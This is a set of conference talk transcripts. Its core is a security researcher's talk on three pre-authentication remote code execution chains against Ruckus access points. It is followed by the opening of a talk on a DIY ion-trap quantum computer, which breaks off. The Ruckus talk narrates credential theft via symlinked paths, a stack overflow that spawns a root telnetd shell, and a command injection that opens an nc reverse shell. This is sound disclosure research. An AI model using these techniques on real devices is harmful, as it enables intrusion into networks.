thanks. Okay, thank you so much. Thank you so much for your question. Thank you for your presentation. It's a very good one. It's my first presentation on FOSTA. Last year I was just a viewer in Brussels in Belgium. And now I'm the presenter in virtual event. That's very cool. Okay, so don't hesitate to come back next year. I hope this year, next year, we will all be in a real room with people and so on. Yeah, we should talk about this, about putting the LWBD in Hello System. I agree. Excellent. So, thank you very much. Thank you. And if there is no more question, I think we can close here the QA session. Okay, I encourage you to contact me if you have any more questions. And thank you once again for your time. Thank you very much. Thank you. Bye. Bye.
This presentation will describe the plan of porting the fwupd daemon to BSD distributions (FreeBSD, OpenBSD, NetBSD, DragonFlyBSD). It will explain the challenges connected with the implementation of firmware update systems. Through the fwupd daemon port, we will extend the functionality of the Linux Vendor Firmware Service (LVFS) to another family of systems. I will demonstrate the process of porting the fwupd/LVFS, based on the previous implementations. Also, I would like to present the fwupd/LVFS chain of trust and answer any questions the BSD community may have on this topic. I would love to hear some suggestions and feedback, which we should take into account during the development process. The security of the whole system is not determined only by the software it runs, but also the firmware. Firmware is a piece of software inseparable from the hardware. It is responsible for proper hardware initialization as well as its security features. That means that the safety of the machine strongly depends on the mitigations of vulnerabilities provided by firmware (like microcode updates, bug/exploit fixes). For these particular reasons, the firmware should be kept up-to-date. Nowadays, one of the most popular firmware update software is fwupd/LVFS. fwupd is a Linux daemon that manages firmware updates of each of your hardware components that have some kind of firmware. What is more fwupd is open source, which makes it more trustworthy than proprietary applications delivered by hardware vendors designed for (only) their devices.
10.5446/53155 (DOI)
Welcome to the next talk. Don't rock us too hard. Owning Ruckus AP devices, which will be, I think, one of the more hardcore hacking talks as we like it here at the Congress. Please give our speaker a round of applause. Just one minute and I'll be good to go. What is that? Awesome. So I'm doing a live demo, so I need to just be prepared with some stuff with a terminal here. It's always good. Another one. Why not? Okay. Wait. What the? Come on. Almost got it. All right. Yeah, now I am almost good to go. Awesome. Thank you, and thank you, CCC, for inviting me to speak here. Before I begin, I would like to ask if anybody is familiar with Ruckus network devices. Raise your hand. All right. Okay. Well, CCC is going to hate me for the next slide. But the first time I saw Ruckus access point was when I intended black at USA this year. I noticed that Ruckus provide the conference Wi-Fi. And when I got back home, I was wondering how many vulnerabilities were discovered on Ruckus equipment. So I did a quick research on cvdetails.com, and I saw that Ruckus had 11 CVEs, and five of them were critical. Those CVEs were post-authenticated command injection. Well, this means no pre-auth RCE were found on Ruckus devices and only post-authentication. So that either means that they are really, really secure, or I let you answer this question yourself. So wait. Before I begin, who am I? My name is Gals War. I'm from Tel Aviv, Israel. I'm a research leader at Aleph Research by HCL Abscan. And I've been doing reversing for around 10 years. And I focus on offensive and embedded devices research. And in this talk, I will be using this Ruckus R510 Unleashed. Ruckus has an Unleashed version for every access point they provide. Unleashed are access points that don't rely on Wi-Fi controllers. However, all access points on this list share the same vulnerable code base. And I noticed that some vulnerabilities also work on zone director product line, which is their Wi-Fi controller. The vulnerabilities, I will show, affect this firmware version and prior. Firmware analysis was pretty much straightforward. No compression, no encryption. And on the R510, you can even get the kernel B config from some odd wisdom. Well, another cool thing about this research is that I did this entire research with device emulation. Only when I actually found a vulnerability, I actually bought a device. Now I would like to talk about my device emulation environment. I'm using my simple yet useful emulation dockers. On my Docker hub, I got pre-built QMU systems for different architecture, such as ARMv7, ARMv6, MIPS and MIPSell. And these dockers really helped me emulating and setting up different routers. For this research, I used Docker that wraps an ARMv7 QMU that runs Debian kernel. And now I would like to show you how easy it is to set up an environment. And that, of course, does not work. So let me just... Hmm. Just a minute. Okay. So just a few more minutes and I'll show the video. Okay, got it. Oops. Awesome. Okay, so here... So here I'm just starting my Docker with port 5575. And I am... Yeah, I'm gonna fast forward a bit because it's not the edit one. And here it just starts up. It takes a few minutes. So I cut it out from the original video. I'll just... All right. Now I'm gonna go to the firmware extraction folder and just start the squashFS root system. And now I can just copy it using SCP to the port, the Docker map to. And now I just tar it and then ssage to the Docker. And I got the tar gz file. I'm gonna extract it. Get into the folder. Sorry. Get into the folder and just use truth to change my root to this squashFS. In any minute. Yeah. All right. So now I'm running truth, change my root. And now I got the rocker's banner and the busybox. The rocker's busybox. And I can see there in its d scripts, which are the startup scripts. Okay. This is it for the doctors. And let's start with some exploits. So this is my first RCE. In this attack, I will fetch admin credentials without authentication and then pop a busybox shell with jailbreak through ssage. Let's start with live demos because demos are fun and what could possibly go wrong, right? Just about everything. But yeah. All right. So for this, I got my terminal and awesome. Let me just do this. Okay. Great. So now I'm going to fetch a file from the router. I'm just using W get and this is my router IP address, the one here. And I'm fetching a file from slash users slash WPS tool. Oh, shit. Thank you very much for that. Yeah. Live demos, right? Yeah. They told me not to do that. Okay. So this is the right terminal. And let me just adjust it as well. Got it. So this one you see, right? Yay. Okay. So I'm using W get and I'm just going to fetch a file from the router IP from user WPS tools to cash slash var slash RPM key dot rev. So I probably got a typo here. And yeah. So now I got the number eight and now I'm going to fetch the same file only with eight and pipe it through strings and grab something called all powerful login. And hopefully I got a typo. Okay. Got it. Powerful login. Yeah. I'm going to copy paste the hell out of it with the right number, which is eight. And this is it. Finally. So those are the admin credentials. I just fetched them unauthenticated just like that. And now to finish my exploit, I will just log into the ssage using the credentials I just fetched. And now I will enter the debug mode, script mode, and use ex command to run being a sage. And as you can see, I got my busy box and I am the admin and I am part of the root group. And this is it. Thank you. Wow. Live demos are tough. Okay. So let's understand what we just saw here. So I started by examining the web server configuration. Rokus uses embed this as its web server interface. And this is how the configuration file looks. We see that it uses slash web as its web root directory. And we also see that it uses EGS handler for dot EGS and dot JSP extension. EGS is embedded JavaScript back in language that the web server uses. But the most important thing is what we don't see here. We don't see any file fetching restriction. That means I can fetch any file from slash web directory regardless of its file extension or type. In other words, no access control whatsoever. Yeah. So now that I know I can fetch any file, I would like to look for some interesting file to fetch. There are 67 files that are not standard web pages. Eight of them are symbolic links. And one in particular is this symbolic link to slash TMP dear. That means every file I will fetch from slash user slash WPS underscore tool underscore cache gonna fetch files from the TMP folder. Yeah. And since I was emulating the router using QMU system mode, I could run the system in its scripts. And I noticed that some files are written to slash TMP on system startup. One of them was this one, RPM.log. This log shows that every day the router writes a backup file called RPM key with a different reversion number. And that file looks like a really good file to fetch. The problem was that it writes it to slash var slash run. I can only fetch files from slash TMP. Well it's not a problem. Slash var slash run is also symbolically linked to slash TMP slash var slash run. Yay for me. Right. So now let's see how I was able to fetch this RPM key file. So yeah, slash user slash WPS tool cache is symbolically linked to TMP. Var run is symbolically linked to TMP var run. Now I was needed to get the RPM key reversion number. Here it's 11. Well there's a file called RPM key dot rev that just stored this number. So I first needed to send a request to get this number. And after that I can just fetch the right RPM key file. Okay. So now that I fetch this RPM key file, I noticed that it contains some binary data. So I just pipe it into strings. And as you can see here, these are the admin credentials in plain fucking text. Right. Yeah. Okay. Great. So to finish my RCE, I wanted a busybox shell. SSH can be enabled from the web interface. But the thing is, Raku's are using their own CLI. At first I tried to run a busybox with hidden command called exclamation mark, V54 exclamation mark. And as you can see, it's supposed to exit the CLI and enter the operation system shell. But the problem was that it needed the device serial number and I don't necessarily got this number. So I had to use a different approach. Basically I used the CLI debug script mode that was only supposed to run store shell scripts. However, this exocommand is vulnerable to pass reversal. So I just used it to run being a sage and I got a busybox shell as root. Awesome. So after this beginner's level CTF vulnerability, it got me thinking. There are probably more vulnerability to discover here. And I was wondering in how many ways I can get code execution on those devices. So this is my second RCE attack. Here I'm exploiting a stack overflow vulnerability with unauthenticated request to an adjunct page. Okay. But before that, I would like to talk about GDRA script I wrote that really helped with the reversing process. So Rocus has left all the log strings in the binary. As you can see here, we got debug, error, info, warn, just about everything. And here we can see a GDRA decompiled code for a function and it's debug log print. What's even better is that Rocus also print the function name for every log print. So I wrote a script that just searched for this log print and renamed the unnamed function with the function from that log print. So here I just updated the name to get ZDDN instead of the undefined function. And here we can see a binary called EMFD. I was able to reduce its undefined function from 1500 to less than 900, which makes the reversing process way shorter. Based on that script, our team member, Vera Mence and I wrote a generic script for GDRA. This script searched for patterns in GDRA, decompiled code and renamed the function with matches. Now I would like to show you how this script can work not only on Rocus code. Here is GDRA decompiled code for a drop executable that was compiled with a trace option. Here we see that its log string contains a function name. This is buff get e-cdsa-prive-key. Our script uses regux to match the log print and group the function name. Then it replaces the function name with the group matches. So this is how we managed to retrieve function name for dropper binary as well. So this script is already available on Alif GitHub account. Feel free to use it. It's really useful for many projects. But back to my second attack. So now I would like to present three important binaries in the web interface. The first one is slash b and slash webs. This is the actual embed this web server. It handles htp request and executes handles according to the configuration we just saw. It then sends command through a Unix domain socket to emfd. Emfd is an executable that contains the web interface logic. It maps function from the web pages to its own function. It then implement web interface commands such as backup, network configuration, retrieve system information and much more. Libemfd.so is a library that's used by emfd for web authentication, some sanitation, and some code execution. And now in a diagram. So webs listen to htp slash htps. If it receives jfsame page, it uses egs handler to pass function to emfd. Emfd then checks if the function name is mapped and if so, he calls the function pointer. And eventually emfd runs some kind of shell command. For example, if config, ip tables, route, and et cetera. I will get back to this later, but look at this carefully because this is where everything messed up. Okay. For example, when I'm sending an htp request to slash admin slash underscore update guest image name dot jsp. Webs invoke the egs handler. This handler uses a function called delegate which sends a command to emfd through a domain Unix socket. emfd then maps every string it receives to a function pointer and runs it. Here we see that egs handler uses upload verify string to send to emfd and emfd then maps this string to a function also called upload verify. All right. Next let's talk about how the authentication mechanism works. So there are four permission levels admin user fm and guest. Here we see that each user has a page with a delegate function call. For example, fm login uses off fm and user login uses off user and so on. Once a user is authenticated, his session is stored for a specific period of time. Each jsp page should check if the session is valid before calling other delegate function. Here we see that underscore cmd state dot jsp calls session check before he calls the adjunct cmd state and that means he checks for valid session before he runs the adjunct cmd state. All right, so I used grep and got 67 pages that did not perform any kind of check. I then listed all the different functions that can be reached without authentication and one function that looked very interesting was this adjunct restricted cmd state. Here we can see that it does not perform the session check and it can be reached by sending a request to slash tool slash underscore rcmd state dot jsp. But enough with the talk, let's go to my second demo which is the Stack Overflow Exploitation. Again I'll just use my terminal. Yeah, just a minute. Live demo is all tough. Apparently. Okay, here am I. Yeah. Okay, so now, everybody see? Yeah. Awesome. So now first I would like to telnet my router on port 1, 2, 3, 4, 5 and see that nothing works which is good. And now this is my payload. So I'm, this is my overflow and I'm going to call 10 at D with minus L and minus P12345. Okay. And now let me just post this payload and hopefully I will not have any typos. God help me. And underscore rcmd state dot jsp. Great. So in a second it should work. Awesome. So I got a message okay which is a great indication. And now I can just telnet my router on port 1, 2, 3, 4, 5 and as you can see I am the admin and again I am the part of the root. Yeah, this is it. Thank you. Okay. So to understand how I was able to exploit this stack overflow I would like to explain how the adgex request works. I was able to run both embed this web server and emfd on the QMU system emulation and that's how I was able to inspect a standard web request like that. Here I call the underscore cmd state dot jsp page which is mapped in emfd to a function called adgex cmd state. Makes sense. Cmd state receives an action attribute from the request. Since the action is do command it uses something called adapter command. Adapter do command then calls a do command function. Do command is a large switch case function that executes different command based on the attribute it gets. In this example it gets get connect status which calls a function called cmd get internet status. Now let's look on a page that do not perform session check. Emfd maps underscore rcmd state jsp to a function called adgex restricted cmd state. This is where the r stands for. The function also called adgex cmd state but with a very limited set of commands. This specific request pass zapd to do command and it runs an executable called zap. This is how zap command runs in the shell. We see that we can control its server and client argument by passing the attribute server and client. The thing is server and client are not sanitized good enough. So I can just pass unintended argument to zap. For example this minus d slash temp slash b crush me please. So I was able to find zap sources online. Ruckus described it as robust network performance test tool. And when I examined the code I noticed there's a stack overflow in the minus d argument. Here's the code that parses minus d argument. Let's see what it does. So first it replaces all commands character with spaces. Then it copies every segment to temp buffer. Since it expects a number this is a very small buffer. And well they try to be secure by using by copying string with strn copy but they use the entire string length for n. So it doesn't really protect the string in any way and I was able to smash the stack. As for expectation R510 uses both nx and aslr. To overcome nx I decided to use rope gadget. I used two gadgets to run system with a pointer to my payload. In this case I'm using telnet d that runs slash bin slash sage as a login page on port 12345. As for aslr since zap is forked from emfd I can use brute force approach and by that overcome its 9 bit of randomness. So now I would like to look at a request that runs zap command again. So if I can control the server and client attributes why can I just use it for command injection? So to understand this I need to understand how zap command is being executed. Here we can see that do command uses exec syscmd implementation to run zap. Exec syscmd implementation is a function in lib emf. This function first called find sysrapper function and then it uses v fork and exec v to execute the shell command. Let's look on find sysrapper decomplied code. We see it looks for slash bin slash sysrapper underscore wrapper dot sh. If the script is available it updates a global variable that I named sysrapper path. Now exec sys command implementation executes slash bin slash sysrapper and in our case it runs zap command with the argument from the adjunct request such as server and client. Here we can see the sysrapper dot sage line count and it seems like a very big script. But it handles many commands but what interesting me is the zap execution command. Here we see that slash bin slash zap is being executed with opt variable. This variable receives both server and client values from the request. However, ops gets its value with quotation mark and that stops me from injecting code. That made my life sucks for a while, to be honest. But what kept me entertained and motivated was that Ruckus had the weirdest CLI in their firmware. So before I continue to my next attack, I would like to show you other Ruckus CLI. So this is the CLI I had to escape for the first attack. This is an entire different CLI that also being used by the device. I noticed that it can be reached after system startup. This CLI also got a hidden command, exclamation mark, V54 exclamation mark that also supposed to escape to busybox. But it also needed the device serial number and it was no good to me. However, this V54 command uses content from this file, slash writeable, slash etc, system, access. The content of the access file was written by another hidden command called Ruckus. I discovered that by passing this string to Ruckus command, I was able to inject code and escape the shell. But now for the weird stuff. When I called Ruckus command to save my payload, this is what I got. And this one, and this one. Yeah, waf, waf, bow, bow, and rough. Yeah. Ruckus CLI actually boxed at me. Yeah. So when I called V54 to execute my command injection, I was asked what the chow? As in chow-chow dogs? What the actual fuck? No, seriously. Well, at the end, I was able to run a busybox shell and I didn't really care about those weird Easter eggs. But it was still pretty entertaining. Yeah. Well, I still wanted to achieve pre-off remote code execution by command injection. And I just knew that EMFD got to be vulnerable. It took me some time, but eventually I made this possible. And this is my last attack where I found a command injection vulnerability and I was able to reach it without authentication by writing a web page. All right. So as I mentioned before, EMFD executes code in a really messy way. EMFD sometimes uses lib-emf, other times called shell script sys-rapper, and sometimes it just runs the command itself with libc. These are all the different functions that EMFD uses to execute shell code. Here we see that there are 107 libc system function call. So I had to find a page that uses this function call without sanitation. I was able to find four functions that call system without, that call system and were vulnerable to command injection, and today I will be showing the last one, which is cmd import AVP port. All right. So to reach the vulnerable function, I need to send an adjunct request to slash admin slash underscore cmd state dot jsp. And my request should look like this. I'm passing a command with cmd equals import AVP port. This also uses do command to call cmd import AVP port function. This function uses libc system function unsafely. Here we see the function decompiled code. All I had to do is to pass command injection in the upload file attribute, and as you can see, it just executes the code. All right. So this is it. That's a win. Well, not exactly. I still needed to be authenticated to reach this function. Well, the problem was that cmd state page check for session, and only then it calls the vulnerable function, adjunct cmd state. All right. So I need a different approach, and what if I could write a page that only calls adjunct cmd state and do not use the session check call? It might actually work. For this, I decided to use the zap executable again. Zap has a lot of different arguments, and we already know that we can pass unintended arguments to it without authentication. One of them is set a path for the zap's log. However, writing a log is not enough for me. I need to control the content. For this, I used tag, sub, and note argument. They are a string, and just so they get a string and just write it in the log file for some extra information. Here is the log file writing code. It gets the file path directly from minus l. And I can control the log content by passing argument, note, tag, and sub. Okay, great. But there are more problems to solve here. I wanted to write a page, and it has to be in the slash web directory. The problem was that slash web is a part of the squash.fs file system, which is a read-only file system. I needed to find a writeable path inside web directory. Luckily, slash web slash uploaded directory is symbolically linked to slash writeable slash etc slash errspider. And this directory is on a writeable file system. Yay for me. Okay, so now I knew that I can write a file with my content to the web directory. The only problem left to solve was that Zap executable needed to connect to something called TX station. Otherwise, it won't write anything to the log file. Since I got Zap sources, I could just compile ZapD, which is the TX station. And now I can set Zap to connect to a station on my computer. Awesome. So this was the request I needed to send. It executed this Zap command. Notice that I used two arguments, minus s sub and minus t tag to write my delegate call. Finally, Zap has wrote a file to slash web slash uploaded slash index dot jsp. Although this page was full of junk, that didn't bother me because what interests me was the delegate call to the vulnerable function. Now I can chain those two vulnerabilities together. First I write a page to slash web slash uploaded slash index dot jsp. Now I can send a command injection payload to the page I just wrote. And this is the time for my last demo, which is the most difficult one. So good luck to me. Okay, so first I will need another terminal. Yeah, this is it. So in this one, I will run ZapD, which is the TX station. And I will listen to port 444 with Netcat. Great. And now for my other terminal. Okay, great. So now I would like to show you the page create payload. So as you can see here, I'm using the server and sending it to my computer. And I'm using the minus l to write a page and minus t and minus s to write the delegate function call to Ajax CMD state. And now I can just post it. Page create, this is it, to my router, slash tool slash underscore rcmdstate dot jsp. No typos. And in a minute, it will just reply and say, okay, awesome. So now I wrote the page. Next I would like to show you my command injection payload. So here I am using NC on the router. And with Netcat, I'm just connecting to my computer on port 4444 with a reverse shell. And, again, I will post this command injection to the router on uploaded slash index dot jsp. Oh, yeah, shit. Sorry about that. Okay, again. Great. And now, hopefully, hopefully I'll see that I am the root user. One more second. Again. And now, be root. Yes! Okay, okay. Yeah, wow. That's, yeah, live demos. How about that? You don't see them anymore. Okay. In conclusion, I demonstrated three pre-auth RCE today. The first one was credential leakage with CLI jailbreak. The second one was stack overflow without authentication. And the last one was command injection with authentication bypass. I also showed my Docker setup and introduced a very useful Jidra script that helped with my research and can help others. Rocker's networks was informed about these vulnerabilities. I requested 10 CVEs for this research and they confirmed these CVEs. If there are any Rocker's user here, you should stop what you're doing and go and check that you're running the latest firmware update. If not, you may be victim to some very serious abuse. So again, please check your firmware ASAP. Okay, and well, this research was a lot of fun. It involved all sorts of different vulnerabilities. It was also an excellent opportunity to check our Docker emulation environment, which proved itself very useful. A blog post with all the details will be posted, but since Rocker's asked really nicely, I will wait with my post until January 6th. So stay tuned for my blog at Aleph Research Blog. And while you're there, check our amazing research. And this is it. Thank you very much for listening. Thank you for this great talk. So now we have quite a lot of time for Q&A. So you already know the game, queue up at the microphones, or ask a question on the Internet. We will today start with the Internet. So please. All right. So there are a couple of questions here. The first question is, will this work on unleashed firmware of Rocker's AP? Yes, we definitely will. Not the latest, but the entire research was conducted on the unleashed version. All right. Now, let's do an in-room question first. A microphone number one, please. So thanks for the great talk first. Then you mentioned that there were 107 handlers for which called system at some point. I hope you didn't check them manually. So my question would be, you probably used GDRA to search for those. Right. How would it be? Yeah. So the system, the reference count just gave me a really good indication that they're doing something wrong. And when I actually searched for command injection, I first looked what are the reachable pages that uses system. So that narrowed the list to something smaller, which was still around 15 or so. So I just saw that the command injection was done pretty much manually with GDRA. No fancy scripts here. So no analyzing of the call tree in GDRA? No. Okay. Thanks. Sure. All right. Microphone number two, please. So first of all, let me just express a what the actual fuck. Then secondly, from a networking consultant perspective, the quad one usage in your scripts, it's easy, but please don't do it because people tend to use quad one as a legit IP address in their systems for dummy IP addresses, which is actually DNS server on the public internet. And just comment. The actual question is the all your attack, your attack vectors are against when you are able to reach the system on a layer three basis, right? Yeah, correct. So both of the attacks are from both the internet or the land, but yeah, only layer three. So okay. And in the end, I can only offer you that I have some hardware from an orange vendor. I can offer you if you want to do some further exploration on other vendors. Yeah, why not? All right. The internet has another question, I think, right? Right. So the internet wants to know, is the virtual smart zone mode also affected? No, only access point and some of the vulnerabilities, as I said, also work for the zone director. All right. Number two, please. Thanks again for the entertaining talk. And I noticed that on some of the slides, there was like a hard coded cross site request for GERY token. So I just wanted to ask what's up with that and were you able to find more places where there are basically security boundaries crossed by a hard coded string like that? Yeah, so we found, so I tried to focus my research more on the low level and like stack overflow and command injection from the binary analyze. But yeah, we saw some web vulnerabilities. One of them is SSRF and another might be with tokens that is still hard coded. There are a lot of things to keep on looking in those fingers. So you didn't report that one? No, the hard coded one, not yet. Okay, thank you. All right, the internet. Right. So how much time did you invest in total for ripping this device into little pieces in so many ways? So it took me one month. The first exploit I found relatively fast. I think it took me around two days. And after that, the other analyze took me around three weeks or so. All right. Microphone number two. Thank you for this awesome talk. I really enjoyed it. The first bit of the presentation was a little bit fast for me, the Docker part. How did you discover that you can run the ROXs firmware in your own Docker container? Can you please repeat your question? How did you discover that you can run the ROXs firmware in your own Docker container so that you can discover all these flaws? Yeah. So I skipped a few steps. So I basically used BeanWalk and after I extracted the, so I downloaded the firmware, used BeanWalk, and then BeanWalk usually extracted squashFS, which is the firmware file system. So I just copied it to my Docker. And because it's a cross architecture Docker, it runs the ARM architecture, and I was able to actually run the code from the firmware, the user space code. Okay. Thank you. Sure. All righty. Any other questions? You have 30 seconds to invent a question. Do you have 30 seconds of content? No, I can do a fancy dance or something like that. All right. Yes, please. Okay. So I wish I could, I wish I could. All right. Still no questions? Well then, a good night to every one of you and thank our speaker again please. Thank you.
Ruckus Networks is a company selling wired and wireless networking equipment and software. This talk presents vulnerability research conducted on Ruckus access points and WiFi controllers, which resulted in 3 different pre-authentication remote code execution. Exploitation used various vulnerabilities such as information leak, authentication bypass, command injection, path traversal, stack overflow, and arbitrary file read/write. Throughout the research, 33 different access points firmware examined, and all of them were found vulnerable. This talk also introduces and shares the framework used in this research. That includes a Ghidra script and a dockerized QEMU full system emulation for easy cross-architecture research setup. Here's a fun fact: BlackHat USA 2019 used Ruckus Networks access points. Presentation Outline: This talk demonstrates 3 remote code executions and the techniques used to find and exploit them. It overviews Ruckus equipment and their attack surfaces. Explain the firmware analysis and emulation prosses using our dockerized QEMU full system framework. -Demonstrate the first RCE and its specifics. Describe the webserver logic using Ghidra decompiler and its scripting environment. -Demonstrate the second RCE using stack overflow vulnerability. -Lastly, demonstrate the third RCE by using a vulnerability chaining technique. All Tools used in this research will be published.
10.5446/53156 (DOI)
Welcome to the world of quantum computing. Well most of you are just going to say that stuff is just for cracking RSA keys, but there is actually a little bit more to that. It's interesting stuff and our next speaker, Jan Allain, is going to introduce this world of quantum computing to us and he's going to show us a couple of application scenarios and how to build your or our own quantum computer. Hello everybody. Guten tag, hallo. This is the only world I know in Deutsch. We will begin this session by trying to convince you that building a quantum computer atom is still possible. This is the agenda. We are in an infosec security conference. Why bother with quantum computing when we work at cyber security? We will try to explain to you in a simple manner how our quantum computer works. We will explain to you how we build our own quantum computer and of course because we are at CCC we need to know how to hack into a quantum computer. So let me introduce myself a little bit. I'm Jan Allain, French. I'm used to share my project with some security conference hacking the blackouts. I was a speaker and trainer in this type of conference. It's the first time for me in CCC so it's very cool. I'm mostly an entrepreneur and engineer and of course my new company, Net GenQ, which stands for a next generation of quantum computers is a quantum company. I work in the infosec security since 25 years now so I'm a veteran of this domain. I fight again. I love you, Varysys and Slammerworm if you remember those worms. And my past activities are related to software and hardware security. So why bother with quantum computing when we work in cybersecurity? If you want to make some difficult calculation on a RSRK for example, to factor a large number on a classical computer, it will take 10 to the power of 334 steps, it's a big number, and it will take on a normal computer 300 trillion of years. It's a long, long time. It's why we say that RSR is secure. On a quantum computer with a specific algorithm called short algorithm, it takes only 10 to the power of 7 steps, it's a smaller number, and it takes only 10 seconds. However, you couldn't think that this statement is a little bit overripe. Yes or no? No. Because short algorithm is able to break RSR. This is the goal of this algorithm in the human time. However, at the moment we speak, to break a big number with this algorithm, you need to have a much bigger quantum computer that exists nowadays. For example, you need a 4,000 ideal qubits quantum computer. It doesn't exist for the moment. However, quantum computing could be used also for some benefits for our domain of Anthos X-Styber security. There is many advantages on the corner. You can use a quantum computer or quantum technology to generate true random number. This is useful for cryptography. You can deploy what is called blind quantum computing. In fact, blind quantum computing is the ultimate privacy for the cloud, for example. Some guys try to launch what they call a quantum internet. It's not so easy a cable networks. With a particular feature for us that could be cool to use, if you use a quantum internet, everyone that tries to spy you on the line will be detected. So it could be very useful. And of course, quantum computing brings to the mass a massive new power of processing. But how does a computer works? This is the one slide quantum mechanics course. Why does fancy new quantum computers are so powerful? In classical computing, we use bits. A bit is only in two states, one or zero. In quantum computing, we replace the bits by the quantum bits, which we call them qubits. These qubits follow the quantum mechanical principle called superposition. And this principle is able to provide to the user several steps at the same time. So if you use a quantum qubit, the qubit could be in a state of zero and one nearly at the same time. It's not exactly what it is, but for us as a computer scientist, we could understand that it's zero and one at the same time. And of course, if a quantum computer, this is a quantum computer, want to manage to deal with all these qubits, it deals with all the solution of the quantum register at the same time. And it will speed up the process of that computing because you take all the space generated by this quantum register and in one clock time, the computer process all solution. This is mainly why and how the quantum computing is so powerful. So it's cool. So I want to build my own qubits. So this is my journey to build my own quantum computer. And you will see that there is some success and failure. And most of the time, and I'm in the middle of this. So I need to choose a technology to build my own qubits hardware. This talk is mainly about hardware, how to build your own hardware to build your own quantum computer. So my ingredients. I need to find a support at the hardware level that's behave like quantum mechanics say you need to behave to do a quantum computer. So I need to find something that's behave at atomic scale. I need to be able to build it so I want to be able to use my do it yourself skills. And I want that my quantum computer work at room temperature. If it could be stable machine, it could be the best. There is many, many technology to build your own qubits. This one is used by small start-up like IBM Google. Mainly the big one use this technology. Microsoft try to use this technology. This technology with diamond vacancy is used by university in Australia and in Ireland, I think. And of course I use this technology. I use the technology called trap iron. So I trapped iron to make a quantum computer. So my low level hardware support and device to do some calculation with my quantum computer is Atom. Why? I choose an Atom to make some fancy new quantum computer. The main reason is because I think I'm able to build it in my garage. It's an affordable and well-spread technology because we use technology that has been developed in 1945. There is a lot of experience with this type of technology. Again, the main reason, in fact, the qubit quality is better than any other technology. We have a long Korean time. If you have a long quantum Korean time, you can make much larger program, for example. So we need to share a bit of theory to understand how this type of computer works. So I made a choice. I could have taken time to make dozens of equations. Mainly I don't understand those equations. To explain to you how to make some calculation with ions. But I found a video on YouTube and I would like to share you this two-minute-only video to let you understand how, at the theoretical point of view, a quantum computer based on ion trap works. Let's see if it works. Aided electrically charged atoms make for excellent qubits. This kind of research has paved the way for a quantum computer prototype. Like an ordinary bit, a qubit can be a 1 or a 0. A qubit differs from a bit because it can also be in combinations of these two states. An ion qubit is made from two of its energy levels. Examples of the same type are identical, so adding more qubits is simple. You just need to add more ions to the system. This is a major plus because a quantum computer will need lots and lots of qubits. Qubits must be configured in certain quantum states in order to perform quantum tasks. In an ion trap, tailored laser pulses can change the energy of an ion, setting it into qubit state 1, 0, or a combination of the two. The qubit's surrounding environment sometimes sneaks in and destroys the qubit state, a covert act that can ruin a computation. But some ion energy levels are naturally isolated, and scientists have come up with clever ways of adding in extra layers of protection. Quantum computer calculations are made from steps called logic gates. This will often involve more than one qubit, which means the qubits should be connected in some way. In an ion trap, neighboring ion qubits are connected through their collective motion. This happens because of their electrical repulsion. Laser pulses target the motion enabling gates between any pair of qubits. To get the result of a calculation, scientists need to tell whether a qubit is in state 1 or 0. Shining laser pulses onto the ions makes only one of the two qubit levels fluoresce, so the result, light or no light, gives information about the calculation. Because many qubits are needed, quantum devices must be designed to be scalable. Researchers can only cram so many ions next to each other in a single ion trap before they get too unruly. But with modules, each containing tens, or hundreds of ions, they can start to wire up a large-scale quantum computer. Light from individual ion modules can be collected, allowing ion qubits from separate modules to communicate using photons rather than their motion. So far, scientists have wired up two such modules, and they are getting ready to deploy larger devices using several more. So now, congratulations, you are experts in ion trap quantum computing. A two-minute video only is necessary. However, we like to build this quantum computer. So the plan is the following. We need some ions, you know that now. You need an ion trap. You need a vacuum chamber because we need to isolate our atom from the environment to maintain the quantum states. We need some laser, as you show in the video, to manipulate the quantum states. We need some low-level software to timely send the pulse of laser to manipulate the ions. And we need a camera to measure the ion-scent quantum states. It's easy now. So let's go to the difficult parts, I think. Mainly I would like to say that it's a work in progress. It's a good word to say that it doesn't finish. And just an alert. We need to manipulate very high power electric voltages. So if you want to do this atom, do it at your own risk. It's not my fault. So how to create, first we need to create an ion trap. How to create an ion trap. What is an ion trap? An ion trap is mainly a bunch of electrodes with specific 3D or 2D geometry. We send to the electrode medium to high power voltage, AC voltage, alternative voltage, from 200 volts to 60 kilovolts, a big number for a voltage. We use moderate to high frequency. This is due to the trap theory. Someone have warned the Nobel Prize to explain that to trap an atom, you need to use an alternative voltage. And this electric voltage will make an electric field. And the goal of the electric field with the trap is just to maintain all the atom in a chain that will float over the air, over the trap. So how to achieve that at a small company budget? It's not for OBEIST, I think. Let's go. So I use my ultra high-tech military grade garage. I use 3D printer, low-cost CNC machine, PCB milling techniques, only open source software, keycard, freecard, flat cam, keycard for the electronics, freecard for the mechanics, and flat cam for the CNC. I use some high-voltage transformer, classical electronic, and of course, isolated gloves. Security first. Safety first. Sometime. And of course, I use eBay as the main procurement utility. First try, I need to make a classical pull trap. Of course, when I don't know how it works, I go to Google and I find that some institution like CERN have a project to make an ion trap from 3D printed parts. I use conductive ink and only I have voltage power supply. So I need to build this. There is the high voltage here, two electrodes, and one ring electrode. The goal is to trap ions with that. So this is the main laboratory I use. So you have a variac. We take the electric plug from your domestic electric network. The high transformer and here, 3D printed, you have two electrodes and a camera. This is the electrode. It's a very safe wiring system. For safety reason, I put some resistance here just to limit the currents. The first time. In a more closer way, you will see that the high voltage is coming from this. We will apply the voltages to the electrode and the camera is still just to see what the electrode would do. It works. I'm succeeding in trapping some macro particles. This is not ion for demonstration purpose, but we succeed to trap in the electrode some particle, macro particle. But we have a first failure because with this geometry, we couldn't shine correctly the laser to manipulate the quantum state. First failure. Second try, we need to make another ion trap based on a new topology, a new geometry of electrode. And this time, we use a linear pull trap to facilitate the laser shining. So again, I need to design on my own this new type because the CERN don't provide me the 3D printed parts. I use conductive ink and high voltages. So the goal is to design this. And in this trap, you will see that we will trap the ion in the chain in the middle of the trap. So I use my 3D printer. I make some roads. The supports, some electrodes. I build all the system. And I plug the cable, the wiring. And the trap, the particle will be trapped in this region. For this second trap, I didn't use resistance to limit the current. So it's impossible to touch this electrode. Because of death. And it works again. And in fact, this is a chain of particles, nearly clearly aligned. And this is my first quantum register of 8 particles. But this is the biggest failure. I need to put this ion trap in the vacuum chamber. A vacuum chamber is this type of thing. It's a big bunch of metal. And we put the ion trap inside this. However, first, why we need a vacuum chamber is to be able to isolate particles from the other atom in atmosphere to avoid collision between atoms. Because if we have collision between atoms, the quantum state is destroyed and the quantum processing is destroyed also. So we need a vacuum chamber. But 3D protein parts are not compatible with ultra high vacuum environments. So it's a big fail. Are we doomed? Maker is a hard job. Really. So we need to find a new solution. We have found one. So I need to find some materials that are compatible with ultra high vacuum environments to build a ion trap. I asked 